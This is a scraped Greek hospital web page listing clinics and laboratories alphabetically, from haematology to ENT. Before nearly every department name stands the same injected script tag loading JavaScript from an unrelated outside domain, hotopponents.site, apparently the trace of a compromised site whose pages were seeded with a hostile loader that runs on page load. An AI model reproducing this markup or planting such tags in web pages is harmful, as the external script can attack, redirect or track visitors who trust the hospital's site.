Κλινικές - Τμήματα

A
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Αιματολογικό Εργαστήριο

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Αιμοδοσίας Εργαστήριο

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Ανοσολογικό Εργαστήριο

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Ακτινοδιαγνωστικό Εργαστήριο

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Ακτινοθεραπευτικό Τμήμα

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Αναισθησιολογικό Τμήμα

Β
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Βιοχημικό - Ιολογικό - Μικροβιολογικό Εργαστήριο

Γ
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Γυναικολογική - Μαιευτική Κλινική ΑΠΘ

Δ
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Δερματολογική Κλινική ΑΠΘ

K
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Καρδιολογική Κλινικη

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Καρδιοχειρουργική Κλινικη

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Κυτταρολογικό Εργαστήριο

I
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Ιατρικής Φυσικής - Ακτινοφυσικής

M
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Μονάδα Ενταντικής Θεραπείας

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Μονάδα Εμφραγμάτων

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Μοριακής Βιολογίας Εργαστήριο

Ν
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Νεογνολογική Πανεπιστημιακή Κλινική Β'

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Νεφρολογική Κλινική - M.E.K.

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Νευρολογική Κλινική

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Νευροχειρουργική Κλινική

Ο
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Οδοντιατρικό Τμήμα

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Ορθοπαιδική Β' Κλινική

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Ορθοπαιδική Γ' Κλινική ΑΠΘ

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Ουρολογική Β' Κλινική ΑΠΘ

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Οφθαλμολογική Β' Κλινική ΑΠΘ

Π
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Παιδιατρική Δ' Κλινική ΑΠΘ

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Παθολογική Α' Κλινική

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Παθολογική Γ' Κλινική ΑΠΘ

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Παθολογικής-Ογκολογίας Κλινική ΑΠΘ

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Παθολογοανατομικό Εργαστήριο

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Πνευμονολογικό Τμήμα

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Πλαστικής Χειρουργικής Κλινική ΑΠΘ

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Πυρηνικής Ιατρικής Εργαστήριο

Τ
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Τμήμα Επειγόντων Περιστατικών

Φ
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Φαρμακείο

Χ
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Χειρουργική Α' Κλινική

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Χειρουργική A' Κλινική ΑΠΘ

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Χειρουργική B' Κλινική

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Χειρουργικής Παίδων B' Κλινική ΑΠΘ

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Χειρουργεία

Ψ
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Ψυχιατρική Α' Κλινική ΑΠΘ

Ω
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

ΩΡΛ Β' Κλινική ΑΠΘ